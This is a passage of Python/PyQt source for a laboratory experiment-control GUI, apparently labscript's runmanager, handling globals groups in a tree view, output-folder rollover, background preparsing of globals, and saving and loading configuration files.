self.close_globals_file(globals_file)
else:
# They clicked on a globals group row.
globals_file = parent_item.text()
group_name = name_item.text()
# What column did they click on?
if item.column() == self.GROUPS_COL_DELETE:
# They clicked the delete button. Delete the group:
self.delete_group(globals_file, group_name, confirm=True)
elif item.column() == self.GROUPS_COL_OPENCLOSE:
# They clicked the open/close button. Which is it, open or close?
group_is_open = item.data(self.GROUPS_ROLE_GROUP_IS_OPEN)
if group_is_open:
self.close_group(globals_file, group_name)
else:
self.open_group(globals_file, group_name)
def on_treeView_groups_doubleLeftClicked(self, index):
item = self.groups_model.itemFromIndex(index)
# The parent item, None if there is no parent:
parent_item = item.parent()
if item.data(self.GROUPS_ROLE_IS_DUMMY_ROW):
return
elif parent_item and item.column() == self.GROUPS_COL_NAME:
# it's a group name item. What's the group and file name?
globals_file = parent_item.text()
group_name = item.text()
if (globals_file, group_name) not in self.currently_open_groups:
self.open_group(globals_file, group_name)
# Focus the tab:
group_tab = self.currently_open_groups[globals_file, group_name]
for i in range(self.ui.tabWidget.count()):
if self.ui.tabWidget.widget(i) is group_tab.ui:
self.ui.tabWidget.setCurrentIndex(i)
break
def on_groups_model_item_changed(self, item):
"""This function is for responding to data changes in the model. The
methods for responding to changes to different columns do different
things. Mostly they make other data changes for model consistency, but
also group creation and renaming is handled in response to changes to
the 'name' column. When we change things elsewhere, we prefer to only
change one thing, and the rest of the changes are triggered here, by
dispatching to the per-column handlers below.
Be careful not to recurse unsafely into this method - changing
something that itself triggers further changes is fine so long as they
peter out and don't get stuck in a loop. If recursion needs to be
stopped, one can disconnect the signal temporarily with the context
manager self.groups_model_item_changed_disconnected. But use this
sparingly, otherwise there's the risk that some required data updates
will be forgotten about and won't happen.
"""
if item.column() == self.GROUPS_COL_NAME:
self.on_groups_model_name_changed(item)
elif item.column() == self.GROUPS_COL_ACTIVE:
self.on_groups_model_active_changed(item)
elif item.column() == self.GROUPS_COL_OPENCLOSE:
self.on_groups_model_openclose_changed(item)
def on_groups_model_name_changed(self, item):
"""Handles group renaming and creation of new groups due to the user
editing the <click to add group> item"""
parent_item = item.parent()
# File rows are supposed to be uneditable, but just to be sure we have
# a group row:
assert parent_item is not None
if item.data(self.GROUPS_ROLE_IS_DUMMY_ROW):
item_text = item.text()
if item_text != self.GROUPS_DUMMY_ROW_TEXT:
# The user has made a new globals group by editing the <click
# to add group> item.
globals_file = parent_item.text()
group_name = item_text
self.new_group(globals_file, group_name)
else:
# User has renamed a globals group.
new_group_name = item.text()
previous_group_name = item.data(self.GROUPS_ROLE_PREVIOUS_NAME)
# Ensure it truly is a name change, and not something else about
# the item changing:
if new_group_name != previous_group_name:
globals_file = parent_item.text()
self.rename_group(globals_file, previous_group_name, new_group_name)
def on_groups_model_active_changed(self, item):
"""Sets the sort data for the item in response to its check state
changing. Also, if this is the first time this function has been
called on the stack, that is, the change was initiated externally
instead of via recursion from this function itself, then set the check
state of other items for consistency. This entails checking/unchecking
all group rows in response to the file row's check state changing, or
changing the file row's check state to reflect the check state of the
child group rows. That's why we need to keep track of the recursion
depth - so that those changes we make don't in turn cause further
changes. But we don't disconnect the on_changed signal altogether,
because we still want to do the update of the sort data, and anything
else that might be added in future."""
self.on_groups_model_active_changed_recursion_depth += 1
try:
check_state = item.checkState()
# Ensure sort data matches active state:
item.setData(check_state, self.GROUPS_ROLE_SORT_DATA)
if self.on_groups_model_active_changed_recursion_depth > 1:
# Prevent all below code from running in response to data changes
# initiated from within this method itself. The code above this
# check still runs in response to all changes.
return
parent_item = item.parent()
if parent_item is not None:
# A 'group active' checkbox changed due to external action (not from this method itself).
# Update the parent file checkbox to reflect the state of its children
children = [parent_item.child(i, self.GROUPS_COL_ACTIVE) for i in range(parent_item.rowCount())]
child_states = [child.checkState() for child in children
if not child.data(self.GROUPS_ROLE_IS_DUMMY_ROW)]
parent_active_index = parent_item.index().sibling(parent_item.index().row(), self.GROUPS_COL_ACTIVE)
parent_active_item = self.groups_model.itemFromIndex(parent_active_index)
if all(state == QtCore.Qt.Checked for state in child_states):
parent_active_item.setCheckState(QtCore.Qt.Checked)
elif all(state == QtCore.Qt.Unchecked for state in child_states):
parent_active_item.setCheckState(QtCore.Qt.Unchecked)
else:
parent_active_item.setCheckState(QtCore.Qt.PartiallyChecked)
else:
# A 'file active' checkbox changed due to external action (not from this method itself).
# Update the check state of all children to match.
name_index = item.index().sibling(item.index().row(), self.GROUPS_COL_NAME)
name_item = self.groups_model.itemFromIndex(name_index)
checkstate = item.checkState()
children = [name_item.child(i, self.GROUPS_COL_ACTIVE) for i in range(name_item.rowCount())]
for child in children:
if not child.data(self.GROUPS_ROLE_IS_DUMMY_ROW):
child.setCheckState(checkstate)
finally:
self.on_groups_model_active_changed_recursion_depth -= 1
if self.on_groups_model_active_changed_recursion_depth == 0:
self.do_model_sort()
# Trigger a preparse to occur:
self.globals_changed()
def on_groups_model_openclose_changed(self, item):
"""Sets item sort data and icon in response to the open/close state of a group
changing."""
parent_item = item.parent()
# The open/close state of a globals group changed. It is definitely a
# group, not a file, as the open/close state of a file shouldn't be
# changing.
assert parent_item is not None # Just to be sure.
# Ensure the sort data matches the open/close state:
group_is_open = item.data(self.GROUPS_ROLE_GROUP_IS_OPEN)
item.setData(group_is_open, self.GROUPS_ROLE_SORT_DATA)
# Set the appropriate icon and tooltip. Changing the icon causes
# itemChanged to be emitted, even if it is the same icon, and even if we
# were to use the same QIcon instance. So to avoid infinite recursion
# we temporarily disconnect the signal whilst we set the icons.
with self.groups_model_item_changed_disconnected:
if group_is_open:
item.setIcon(QtGui.QIcon(':qtutils/fugue/cross'))
item.setToolTip('Close globals group.')
else:
item.setIcon(QtGui.QIcon(':qtutils/fugue/plus'))
item.setToolTip('Load globals group into runmanager.')
self.do_model_sort()
# If this changed the sort order, ensure the item is still visible:
scroll_treeview_to_row_if_current(self.ui.treeView_groups, item)
@inmain_decorator()
def get_default_output_folder(self):
"""Returns what the default output folder would be right now, based on
the current date and selected labscript file. Returns empty string if
no labscript file is selected. Does not create the default output
folder, does not check if it exists."""
current_day_folder_suffix = time.strftime(self.output_folder_format)
current_labscript_file = self.ui.lineEdit_labscript_file.text()
if not current_labscript_file:
return ''
current_labscript_basename = os.path.splitext(os.path.basename(current_labscript_file))[0]
default_output_folder = os.path.join(self.experiment_shot_storage,
current_labscript_basename, current_day_folder_suffix)
default_output_folder = os.path.normpath(default_output_folder)
return default_output_folder
def rollover_shot_output_folder(self):
"""Runs in a thread, checking once a second if it is a new day or the
labscript file has changed. If it is or has, sets the default folder
in which compiled shots will be put. Does not create the folder if it
does not already exist; this will be done at compile-time. Will run
immediately without waiting a full second if the threading.Event
self.output_folder_update_required is set() from anywhere."""
previous_default_output_folder = self.get_default_output_folder()
while True:
# Wait up to one second, shorter if the Event() gets set() by someone:
self.output_folder_update_required.wait(1)
self.output_folder_update_required.clear()
previous_default_output_folder = self.check_output_folder_update(previous_default_output_folder)
@inmain_decorator()
def check_output_folder_update(self, previous_default_output_folder):
"""Do a single check of whether the output folder needs updating. This
is implemented as a separate function to the above loop so that the
whole check happens at once in the Qt main thread and hence is atomic
and can't be interfered with by other Qt calls in the program."""
current_default_output_folder = self.get_default_output_folder()
if current_default_output_folder is None:
# No labscript file selected:
return previous_default_output_folder
currently_selected_output_folder = self.ui.lineEdit_shot_output_folder.text()
if current_default_output_folder != previous_default_output_folder:
# It's a new day, or a new labscript file.
# Is the user using default folders?
if currently_selected_output_folder == previous_default_output_folder:
# Yes they are. In that case, update to use the new folder:
self.ui.lineEdit_shot_output_folder.setText(current_default_output_folder)
return current_default_output_folder
return previous_default_output_folder
@inmain_decorator()
def globals_changed(self):
"""Called from either self or a GroupTab to inform runmanager that
something about globals has changed, and that they need parsing
again"""
self.ui.pushButton_engage.setEnabled(False)
QtCore.QTimer.singleShot(1,self.preparse_globals_required.set)
def update_axes_indentation(self):
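# Indent each axis name by one space per row index, so that the ordering
# of the axes is visually apparent in the treeview: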
for i in range(self.axes_model.rowCount()):
item = self.axes_model.item(i, self.AXES_COL_NAME)
text = item.text().lstrip()
text = ' '*i + text
item.setText(text)
@inmain_decorator() # Is called by preparser thread
def update_axes_tab(self, expansions, dimensions):
# get set of expansions
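# Axes are identified by strings of the form 'outer <global_name>' or
# 'zip <zip_group_name>'; taking a set below collapses the zip entries
# shared by multiple globals into a single axis.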
expansion_list = []
for global_name, expansion in expansions.items():
if expansion:
if expansion == 'outer':
expansion_list.append('outer '+global_name)
else:
expansion_list.append('zip '+expansion)
expansion_list = set(expansion_list)
# find items to delete
for i in reversed(range(self.axes_model.rowCount())):
item = self.axes_model.item(i, self.AXES_COL_NAME)
name = item.data(self.AXES_ROLE_NAME)
if name not in expansion_list:
item = self.axes_model.takeRow(i)
del item
else:
length_item = self.axes_model.item(i, self.AXES_COL_LENGTH)
if name in dimensions:
length_item.setText("{}".format(dimensions[name]))
else:
length_item.setText('Unknown')
# remove from expansions list so we don't add it again
expansion_list.remove(name)
# add new rows
for expansion_name in expansion_list:
shuffle = self.ui.pushButton_shuffle.checkState() != QtCore.Qt.Unchecked
self.add_item_to_axes_model(expansion_name, shuffle, dimensions)
self.update_axes_indentation()
def add_item_to_axes_model(self, expansion_name, shuffle, dimensions = None):
if dimensions is None:
dimensions = {}
items = []
expansion_type, name = expansion_name.split()
name_item = QtGui.QStandardItem(name)
name_item.setData(expansion_name, self.AXES_ROLE_NAME)
if expansion_type == 'outer':
name_item.setIcon(QtGui.QIcon(':qtutils/custom/outer'))
else:
name_item.setIcon(QtGui.QIcon(':qtutils/custom/zip'))
items.append(name_item)
length = 'Unknown'
if expansion_name in dimensions:
length = "{}".format(dimensions[expansion_name])
length_item = QtGui.QStandardItem(length)
items.append(length_item)
shuffle_item = QtGui.QStandardItem()
shuffle_item.setCheckable(True)
shuffle_item.setCheckState(QtCore.Qt.Checked if shuffle else QtCore.Qt.Unchecked)
items.append(shuffle_item)
self.axes_model.appendRow(items)
@inmain_decorator() # Is called by preparser thread
def update_tabs_parsing_indication(self, active_groups, sequence_globals, evaled_globals, n_shots):
for group_tab in self.currently_open_groups.values():
group_tab.update_parse_indication(active_groups, sequence_globals, evaled_globals)
self.ui.pushButton_engage.setEnabled(True)
if n_shots == 1:
n_shots_string = '(1 shot)'
else:
n_shots_string = '({} shots)'.format(n_shots)
self.ui.pushButton_engage.setText('Engage {}'.format(n_shots_string))
def preparse_globals(self):
active_groups = self.get_active_groups()
if active_groups is None:
# There was an error, get_active_groups has already shown
# it to the user.
return
# Expansion mode is automatically updated when the global's
# type changes. If this occurs, we will have to parse again to
# include the change:
while True:
results = self.parse_globals(active_groups, raise_exceptions=False, expand_globals=False, return_dimensions = True)
sequence_globals, shots, evaled_globals, global_hierarchy, expansions, dimensions = results
n_shots = len(shots)
expansions_changed = self.guess_expansion_modes(
active_groups, evaled_globals, global_hierarchy, expansions)
if not expansions_changed:
# Now expand globals while parsing to calculate the number of shots.
# This must only be done after the expansion type guessing has been updated,
# to avoid exceptions when changing a zip group from a list to a single value.
results = self.parse_globals(active_groups, raise_exceptions=False, expand_globals=True, return_dimensions = True)
sequence_globals, shots, evaled_globals, global_hierarchy, expansions, dimensions = results
n_shots = len(shots)
break
self.update_tabs_parsing_indication(active_groups, sequence_globals, evaled_globals, n_shots)
self.update_axes_tab(expansions, dimensions)
def preparse_globals_loop(self):
"""Runs in a thread, waiting on a threading.Event that tells us when
some globals have changed, and calls parse_globals to evaluate them
all before feeding the results back to the relevant tabs to be
displayed."""
while True:
try:
# Wait until we're needed:
self.preparse_globals_required.wait()
self.preparse_globals_required.clear()
# Do some work:
self.preparse_globals()
except Exception:
# Raise the error, but keep going so we don't take down the
# whole thread if there is a bug.
exc_info = sys.exc_info()
zprocess.raise_exception_in_thread(exc_info)
continue
def get_group_item_by_name(self, globals_file, group_name, column, previous_name=None):
"""Returns an item from the row representing a globals group in the
groups model. Which item is returned is set by the column argument."""
parent_item = self.groups_model.findItems(globals_file, column=self.GROUPS_COL_NAME)[0]
possible_name_items = self.groups_model.findItems(group_name, QtCore.Qt.MatchRecursive,
column=self.GROUPS_COL_NAME)
# Don't accidentally match on other groups or files with the same name
# as this group:
possible_name_items = [item for item in possible_name_items if item.parent() == parent_item]
if previous_name is not None:
# Also filter by previous name, useful for telling rows apart when
# a rename is in progress and two rows may temporarily contain the
# same name (though the rename code will throw an error and revert
# it).
possible_name_items = [item for item in possible_name_items
if item.data(self.GROUPS_ROLE_PREVIOUS_NAME) == previous_name]
elif group_name != self.GROUPS_DUMMY_ROW_TEXT:
# Don't return the dummy item unless they asked for it explicitly
# - if a new group is being created, its name might be
# simultaneously present in its own row and the dummy row too.
possible_name_items = [item for item in possible_name_items
if not item.data(self.GROUPS_ROLE_IS_DUMMY_ROW)]
if len(possible_name_items) > 1:
raise LookupError('Multiple items found')
elif not possible_name_items:
raise LookupError('No item found')
name_item = possible_name_items[0]
name_index = name_item.index()
# Found the name item, get the sibling item for the column requested:
item_index = name_index.sibling(name_index.row(), column)
item = self.groups_model.itemFromIndex(item_index)
return item
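# The sibling lookup used above, in isolation (illustrative sketch only): given an
# item's index, the item in the same row but another column of a QStandardItemModel
# is obtained via
#
#     index = name_item.index()
#     other = model.itemFromIndex(index.sibling(index.row(), other_column))
#
# where `model` and `other_column` stand in for self.groups_model and the requested
# column argument.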
def do_model_sort(self):
header = self.ui.treeView_groups.header()
sort_column = header.sortIndicatorSection()
sort_order = header.sortIndicatorOrder()
self.ui.treeView_groups.sortByColumn(sort_column, sort_order)
@inmain_decorator() # Can be called from a non-main thread
def get_active_groups(self):
"""Returns active groups in the format {group_name: globals_file}.
Displays an error dialog and returns None if multiple groups of the
same name are selected, this is invalid - selected groups must be
uniquely named."""
active_groups = {}
for i in range(self.groups_model.rowCount()):
file_name_item = self.groups_model.item(i, self.GROUPS_COL_NAME)
for j in range(file_name_item.rowCount()):
group_name_item = file_name_item.child(j, self.GROUPS_COL_NAME)
group_active_item = file_name_item.child(j, self.GROUPS_COL_ACTIVE)
if group_active_item.checkState() == QtCore.Qt.Checked:
group_name = group_name_item.text()
globals_file = file_name_item.text()
if group_name in active_groups:
error_dialog('There are two active groups named %s. ' % group_name +
'Active groups must have unique names to be used together.')
return
active_groups[group_name] = globals_file
return active_groups
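# Example of the mapping this returns (hypothetical file and group names):
#
#     {'MOT': '/experiments/globals.h5', 'imaging': '/experiments/calibration.h5'}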
def open_globals_file(self, globals_file):
# Do nothing if this file is already open:
if self.groups_model.findItems(globals_file, column=self.GROUPS_COL_NAME):
return
# Get the groups:
groups = runmanager.get_grouplist(globals_file)
# Add the parent row:
file_name_item = QtGui.QStandardItem(globals_file)
file_name_item.setEditable(False)
file_name_item.setToolTip(globals_file)
# Sort column by name:
file_name_item.setData(globals_file, self.GROUPS_ROLE_SORT_DATA)
file_active_item = QtGui.QStandardItem()
file_active_item.setCheckState(QtCore.Qt.Unchecked)
# Sort column by CheckState - must keep this updated when checkstate changes:
file_active_item.setData(QtCore.Qt.Unchecked, self.GROUPS_ROLE_SORT_DATA)
file_active_item.setEditable(False)
file_active_item.setToolTip('Check to set all the file\'s groups as active.')
file_delete_item = QtGui.QStandardItem() # Blank, only groups have a delete button
file_delete_item.setEditable(False)
# Must be set to something so that the dummy row doesn't get sorted first:
file_delete_item.setData(False, self.GROUPS_ROLE_SORT_DATA)
file_close_item = QtGui.QStandardItem()
file_close_item.setIcon(QtGui.QIcon(':qtutils/fugue/cross'))
file_close_item.setEditable(False)
file_close_item.setToolTip('Close globals file.')
self.groups_model.appendRow([file_name_item, file_active_item, file_delete_item, file_close_item])
# Add the groups as children:
for group_name in groups:
row = self.make_group_row(group_name)
file_name_item.appendRow(row)
# Finally, add the <Click to add group> row at the bottom:
dummy_name_item = QtGui.QStandardItem(self.GROUPS_DUMMY_ROW_TEXT)
dummy_name_item.setToolTip('Click to add group')
# This lets later code know that this row does
# not correspond to an actual globals group:
dummy_name_item.setData(True, self.GROUPS_ROLE_IS_DUMMY_ROW)
dummy_name_item.setData(self.GROUPS_DUMMY_ROW_TEXT, self.GROUPS_ROLE_PREVIOUS_NAME)
dummy_name_item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsEditable) # Clears the 'selectable' flag
dummy_active_item = QtGui.QStandardItem()
dummy_active_item.setData(True, self.GROUPS_ROLE_IS_DUMMY_ROW)
dummy_active_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_delete_item = QtGui.QStandardItem()
dummy_delete_item.setData(True, self.GROUPS_ROLE_IS_DUMMY_ROW)
dummy_delete_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_open_close_item = QtGui.QStandardItem()
dummy_open_close_item.setData(True, self.GROUPS_ROLE_IS_DUMMY_ROW)
dummy_open_close_item.setFlags(QtCore.Qt.NoItemFlags)
# Not setting anything as the above items' sort role has the effect of
# ensuring this row is always sorted to the end of the list, without
# us having to implement any custom sorting methods or subclassing
# anything, yay.
file_name_item.appendRow([dummy_name_item, dummy_active_item, dummy_delete_item, dummy_open_close_item])
# Expand the child items to be visible:
self.ui.treeView_groups.setExpanded(file_name_item.index(), True)
self.globals_changed()
self.do_model_sort()
# If this changed the sort order, ensure the file item is visible:
scroll_treeview_to_row_if_current(self.ui.treeView_groups, file_name_item)
def make_group_row(self, group_name):
"""Returns a new row representing one group in the groups tab, ready to be
inserted into the model."""
group_name_item = QtGui.QStandardItem(group_name)
# We keep the previous name around so that we can detect what changed:
group_name_item.setData(group_name, self.GROUPS_ROLE_PREVIOUS_NAME)
# Sort column by name:
group_name_item.setData(group_name, self.GROUPS_ROLE_SORT_DATA)
group_active_item = QtGui.QStandardItem()
group_active_item.setCheckState(QtCore.Qt.Unchecked)
# Sort column by CheckState - must keep this updated whenever the
# checkstate changes:
group_active_item.setData(QtCore.Qt.Unchecked, self.GROUPS_ROLE_SORT_DATA)
group_active_item.setEditable(False)
group_active_item.setToolTip(
'Whether or not the globals within this group should be used by runmanager for compilation.')
group_delete_item = QtGui.QStandardItem()
group_delete_item.setIcon(QtGui.QIcon(':qtutils/fugue/minus'))
# Must be set to something so that the dummy row doesn't get sorted first:
group_delete_item.setData(False, self.GROUPS_ROLE_SORT_DATA)
group_delete_item.setEditable(False)
group_delete_item.setToolTip('Delete globals group from file.')
group_open_close_item = QtGui.QStandardItem()
group_open_close_item.setIcon(QtGui.QIcon(':qtutils/fugue/plus'))
group_open_close_item.setData(False, self.GROUPS_ROLE_GROUP_IS_OPEN)
# Sort column by whether group is open - must keep this manually
# updated when the state changes:
group_open_close_item.setData(False, self.GROUPS_ROLE_SORT_DATA)
group_open_close_item.setEditable(False)
group_open_close_item.setToolTip('Load globals group into runmanager.')
row = [group_name_item, group_active_item, group_delete_item, group_open_close_item]
return row
def close_globals_file(self, globals_file, confirm=True):
item = self.groups_model.findItems(globals_file, column=self.GROUPS_COL_NAME)[0]
# Close any open groups in this globals file:
child_name_items = [item.child(i, self.GROUPS_COL_NAME) for i in range(item.rowCount())]
child_openclose_items = [item.child(i, self.GROUPS_COL_OPENCLOSE) for i in range(item.rowCount())]
child_is_open = [child_item.data(self.GROUPS_ROLE_GROUP_IS_OPEN)
for child_item in child_openclose_items]
if confirm and any(child_is_open):
if not question_dialog('Close %s? This will close %d currently open group(s).' %
(globals_file, child_is_open.count(True))):
return
to_close = [name_item for name_item, is_open in zip(child_name_items, child_is_open) if is_open]
for name_item in to_close:
group_name = name_item.text()
self.close_group(globals_file, group_name)
# Remove the globals file from the model:
self.groups_model.removeRow(item.row())
self.globals_changed()
def copy_group(self, source_globals_file, source_group_name, dest_globals_file=None, delete_source_group=False):
"""This function copys a group of globals with the name source_group_name from the file
source_globals_file to a new file dest_globals_file. If delete_source_group is True
the source group is deleted after copying"""
if delete_source_group and source_globals_file == dest_globals_file:
return
try:
dest_group_name = runmanager.copy_group(source_globals_file, source_group_name, dest_globals_file, delete_source_group)
except Exception as e:
error_dialog(str(e))
else:
# Insert the newly created globals group into the model, as a
# child row of the new globals file.
if dest_globals_file is None:
dest_globals_file = source_globals_file
# Find the new group's parent row by filepath:
for index in range(self.groups_model.rowCount()):
if self.groups_model.item(index, self.GROUPS_COL_NAME).text() == dest_globals_file:
parent_row = self.groups_model.item(index)
break
last_index = parent_row.rowCount()
# Insert it as the row before the last (dummy) row:
group_row = self.make_group_row(dest_group_name)
parent_row.insertRow(last_index - 1, group_row)
self.do_model_sort()
# Open the group
self.open_group(dest_globals_file, dest_group_name)
name_item = group_row[self.GROUPS_COL_NAME]
self.globals_changed()
self.ui.treeView_groups.setCurrentIndex(name_item.index())
# delete original
if delete_source_group:
self.delete_group(source_globals_file, source_group_name, confirm=False)
# If this changed the sort order, ensure the group item is still visible:
scroll_treeview_to_row_if_current(self.ui.treeView_groups, name_item)
def new_group(self, globals_file, group_name):
item = self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_NAME,
previous_name=self.GROUPS_DUMMY_ROW_TEXT)
try:
runmanager.new_group(globals_file, group_name)
except Exception as e:
error_dialog(str(e))
else:
# Insert the newly created globals group into the model, as a
# child row of the globals file it belongs to.
group_row = self.make_group_row(group_name)
last_index = item.parent().rowCount()
# Insert it as the row before the last (dummy) row:
item.parent().insertRow(last_index - 1, group_row)
self.do_model_sort()
# Open the group and mark it active:
self.open_group(globals_file, group_name)
active_item = group_row[self.GROUPS_COL_ACTIVE]
name_item = group_row[self.GROUPS_COL_NAME]
active_item.setCheckState(QtCore.Qt.Checked)
self.globals_changed()
self.ui.treeView_groups.setCurrentIndex(name_item.index())
# If this changed the sort order, ensure the group item is still visible:
scroll_treeview_to_row_if_current(self.ui.treeView_groups, name_item)
finally:
# Set the dummy row's text back ready for another group to be created:
item.setText(self.GROUPS_DUMMY_ROW_TEXT)
def open_group(self, globals_file, group_name, trigger_preparse=True):
assert (globals_file, group_name) not in self.currently_open_groups # sanity check
group_tab = GroupTab(self.ui.tabWidget, globals_file, group_name)
self.currently_open_groups[globals_file, group_name] = group_tab
# Set the open/close state in the groups_model. itemChanged will be
# emitted and self.on_groups_model_item_changed will handle updating
# the other data roles, icons etc:
openclose_item = self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_OPENCLOSE)
openclose_item.setData(True, self.GROUPS_ROLE_GROUP_IS_OPEN)
# Trigger a preparse to occur in light of this. Calling code can
# disable this so that multiple groups can be opened at once without
# triggering a preparse. If they do so, they should call
# self.globals_changed() themselves.
if trigger_preparse:
self.globals_changed()
def rename_group(self, globals_file, previous_group_name, new_group_name):
item = self.get_group_item_by_name(globals_file, new_group_name, self.GROUPS_COL_NAME,
previous_name=previous_group_name)
try:
runmanager.rename_group(globals_file, previous_group_name, new_group_name)
except Exception as e:
error_dialog(str(e))
# Set the item text back to the old name, since the rename failed:
item.setText(previous_group_name)
else:
item.setData(new_group_name, self.GROUPS_ROLE_PREVIOUS_NAME)
item.setData(new_group_name, self.GROUPS_ROLE_SORT_DATA)
self.do_model_sort()
# If this changed the sort order, ensure the group item is still visible:
scroll_treeview_to_row_if_current(self.ui.treeView_groups, item)
group_tab = self.currently_open_groups.pop((globals_file, previous_group_name), None)
if group_tab is not None:
# Change labels and tooltips appropriately if the group is open:
group_tab.set_file_and_group_name(globals_file, new_group_name)
# Re-add it to the dictionary under the new name:
self.currently_open_groups[globals_file, new_group_name] = group_tab
def close_group(self, globals_file, group_name):
group_tab = self.currently_open_groups.pop((globals_file, group_name), None)
assert group_tab is not None # Just in case
group_tab.close()
openclose_item = self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_OPENCLOSE)
openclose_item.setData(False, self.GROUPS_ROLE_GROUP_IS_OPEN)
def delete_group(self, globals_file, group_name, confirm=True):
if confirm:
if not question_dialog("Delete the group '%s'?" % group_name):
return
# If the group is open, close it:
group_tab = self.currently_open_groups.get((globals_file, group_name))
if group_tab is not None:
self.close_group(globals_file, group_name)
runmanager.delete_group(globals_file, group_name)
# Find the entry for this group in self.groups_model and remove it:
name_item = self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_NAME)
name_item.parent().removeRow(name_item.row())
self.globals_changed()
def on_save_configuration_triggered(self):
if self.last_save_config_file is None:
self.on_save_configuration_as_triggered()
self.ui.actionSave_configuration_as.setEnabled(True)
self.ui.actionRevert_configuration.setEnabled(True)
else:
self.save_configuration(self.last_save_config_file)
def on_revert_configuration_triggered(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = 'Revert configuration to the last saved state in \'%s\'?' % self.last_save_config_file
reply = QtWidgets.QMessageBox.question(self.ui, 'Load configuration', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return
elif reply == QtWidgets.QMessageBox.Yes:
self.load_configuration(self.last_save_config_file)
else:
error_dialog('no changes to revert')
def on_save_configuration_as_triggered(self):
if self.last_save_config_file is not None:
default = self.last_save_config_file
else:
default = os.path.join(self.exp_config.get('paths', 'experiment_shot_storage'), 'runmanager.ini')
save_file = QtWidgets.QFileDialog.getSaveFileName(self.ui,
'Select file to save current runmanager configuration',
default,
"config files (*.ini)")
if type(save_file) is tuple:
save_file, _ = save_file
if not save_file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
save_file = os.path.abspath(save_file)
self.save_configuration(save_file)
def get_save_data(self):
# Get the currently open files and active groups:
h5_files_open = []
active_groups = []
for i in range(self.groups_model.rowCount()):
file_name_item = self.groups_model.item(i, self.GROUPS_COL_NAME)
globals_file_name = file_name_item.text()
h5_files_open.append(globals_file_name)
for j in range(file_name_item.rowCount()):
group_name_item = file_name_item.child(j, self.GROUPS_COL_NAME)
group_name = group_name_item.text()
group_active_item = file_name_item.child(j, self.GROUPS_COL_ACTIVE)
if group_active_item.checkState() == QtCore.Qt.Checked:
active_groups.append((globals_file_name, group_name))
# Get the currently open groups:
groups_open = []
for i in range(self.ui.tabWidget.count()):
tab_page = self.ui.tabWidget.widget(i)
for (globals_file_name, group_name), group_tab in self.currently_open_groups.items():
if group_tab.ui is tab_page:
groups_open.append((globals_file_name, group_name))
break
# Get the labscript file, output folder, and whether the output folder
# is default:
current_labscript_file = self.ui.lineEdit_labscript_file.text()
shot_output_folder = self.ui.lineEdit_shot_output_folder.text()
is_using_default_shot_output_folder = (shot_output_folder == self.get_default_output_folder())
# Only save the shot output folder if not using the default, that way
# the folder updating as the day rolls over will not be detected as a
# change to the save data:
if is_using_default_shot_output_folder:
shot_output_folder = ''
# Get the server hostnames:
BLACS_host = self.ui.lineEdit_BLACS_hostname.text()
send_to_runviewer = self.ui.checkBox_view_shots.isChecked()
send_to_BLACS = self.ui.checkBox_run_shots.isChecked()
shuffle = self.ui.pushButton_shuffle.isChecked()
# axes tab information
axes = []
for i in range(self.axes_model.rowCount()):
name_item = self.axes_model.item(i, self.AXES_COL_NAME)
shuffle_item = self.axes_model.item(i, self.AXES_COL_SHUFFLE)
shuffle_state = shuffle_item.checkState()
axes.append((name_item.data(self.AXES_ROLE_NAME), 1 if shuffle_state == QtCore.Qt.Checked else 0))
save_data = {'h5_files_open': h5_files_open,
'active_groups': active_groups,
'groups_open': groups_open,
'current_labscript_file': current_labscript_file,
'shot_output_folder': shot_output_folder,
'is_using_default_shot_output_folder': is_using_default_shot_output_folder,
'send_to_runviewer': send_to_runviewer,
'send_to_BLACS': send_to_BLACS,
'shuffle': shuffle,
'axes': axes,
'BLACS_host': BLACS_host}
return save_data
def save_configuration(self, save_file):
runmanager_config = LabConfig(save_file)
save_data = self.get_save_data()
self.last_save_config_file = save_file
self.last_save_data = save_data
for key, value in save_data.items():
runmanager_config.set('runmanager_state', key, pprint.pformat(value))
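# Values are written with pprint.pformat() and read back with ast.literal_eval() in
# load_configuration() below, so only Python literals survive the round trip.
# Minimal sketch of that round trip (illustrative, not part of the original module):
#
#     import ast, pprint
#     text = pprint.pformat(['globals.h5', ('globals.h5', 'MOT')])
#     assert ast.literal_eval(text) == ['globals.h5', ('globals.h5', 'MOT')]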
def on_load_configuration_triggered(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = ('Current configuration (which groups are active/open and other GUI state) '
'has changed: save config file \'%s\'?' % self.last_save_config_file)
reply = QtWidgets.QMessageBox.question(self.ui, 'Load configuration', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return
if reply == QtWidgets.QMessageBox.Yes:
self.save_configuration(self.last_save_config_file)
if self.last_save_config_file is not None:
default = self.last_save_config_file
else:
default = os.path.join(self.exp_config.get('paths', 'experiment_shot_storage'), 'runmanager.ini')
file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select runmanager configuration file to load',
default,
"config files (*.ini)")
if type(file) is tuple:
file, _ = file
if not file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
file = os.path.abspath(file)
self.load_configuration(file)
def load_configuration(self, filename):
self.last_save_config_file = filename
self.ui.actionSave_configuration.setText('Save configuration %s'%filename)
# Close all files:
save_data = self.get_save_data()
for globals_file in save_data['h5_files_open']:
self.close_globals_file(globals_file, confirm=False)
# Ensure folder exists, if this was opened programmatically we are
# creating the file, so the directory had better exist!
mkdir_p(os.path.dirname(filename))
runmanager_config = LabConfig(filename)
has_been_a_warning = [False]
def warning(message):
if not has_been_a_warning[0]:
has_been_a_warning[0] = True
self.output_box.output('\n')
self.output_box.output('Warning: %s\n' % message, red=True)
try:
h5_files_open = ast.literal_eval(runmanager_config.get('runmanager_state', 'h5_files_open'))
except Exception:
pass
else:
for globals_file in h5_files_open:
if os.path.exists(globals_file):
try:
self.open_globals_file(globals_file)
self.last_opened_globals_folder = os.path.dirname(globals_file)
